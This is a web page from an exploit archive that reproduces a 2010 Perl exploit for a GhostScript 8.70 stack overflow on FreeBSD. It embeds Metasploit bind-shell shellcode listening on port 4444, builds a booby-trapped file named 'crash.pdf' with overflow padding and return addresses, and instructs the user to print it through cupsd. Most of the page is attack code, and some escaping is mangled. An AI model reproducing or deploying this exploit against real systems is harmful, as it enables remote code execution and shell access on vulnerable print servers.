Home / os / win7

GhostScript PostScript File Stack Overflow Exploit

Posted on 18 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>GhostScript PostScript File Stack Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================
GhostScript PostScript File Stack Overflow Exploit
==================================================


##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - &lt;rbranco *noSPAM* checkpoint.com&gt;        #
#                                    #
# GhostScript Stack Overflow                         #
#                                    # 
##########################################################################
 
# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $buf =
&quot;x54x5axdaxd1xd9x72xf4x5ax4ax4ax4ax4ax4ax43&quot; .
&quot;x43x43x43x43x43x52x59x56x54x58x33x30x56x58&quot; .
&quot;x34x41x50x30x41x33x48x48x30x41x30x30x41x42&quot; .
&quot;x41x41x42x54x41x41x51x32x41x42x32x42x42x30&quot; .
&quot;x42x42x58x50x38x41x43x4ax4ax49x50x31x49x50&quot; .
&quot;x46x30x45x38x4bx4fx44x42x42x31x51x4cx4dx59&quot; .
&quot;x4bx57x50x50x43x5ax45x51x42x4ax44x42x42x4a&quot; .
&quot;x44x50x4ex50x45x31x48x4dx4bx30x51x47x46x30&quot; .
&quot;x46x30x43x5ax45x38x51x48x48x4dx4bx30x4dx59&quot; .
&quot;x51x57x4ax4cx48x30x43x5ax48x4dx4dx50x4ex50&quot; .
&quot;x45x4ex48x4dx4dx50x50x50x50x50x43x5ax51x4a&quot; .
&quot;x50x58x48x4dx4dx50x4bx4fx50x4fx4ax44x43x49&quot; .
&quot;x4bx46x46x30x42x48x46x4fx46x4fx44x33x42x48&quot; .
&quot;x43x58x46x4fx43x52x45x39x42x4ex4bx39x4bx53&quot; .
&quot;x46x30x46x34x50x53x50x50x48x30x47x4bx48x4d&quot; .
&quot;x4dx50x41x41&quot;;
 
$pkt = &quot;e!PS&quot;.
&quot;A&quot; x 500 . &quot;00001111222233334444555556666777788889999aaa&quot;.
&quot;x40xd9xbfxbf&quot;. #Shellcode Addr
&quot;bccccddd&quot;.
&quot;xefxbexbfxbf&quot;.
&quot;ffff&quot;.
&quot;xffxbf&quot; x 100 .
&quot;C&quot; x (1200 - length($buf)) . $buf . &quot;Z&quot; x 100;
 
print STDERR &quot;Check Point Vulnerability Discovery Team (VDT)
&quot;;
print STDERR &quot;GhostScript 8.70 exploit for FreeBSD 8.0!
&quot;;
print STDERR &quot;Rodrigo Rubira Branco (BSDaemon)
&quot;;
 
print STDERR &quot;
Creating evil pdf ...&quot;;
 
open(F,&quot;&gt;crash.pdf&quot;);
 
print F $pkt;
 
close(F);
 
print STDERR &quot; d0ne!
&quot;;
print &quot;Now print it via cupsd!
&quot;;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :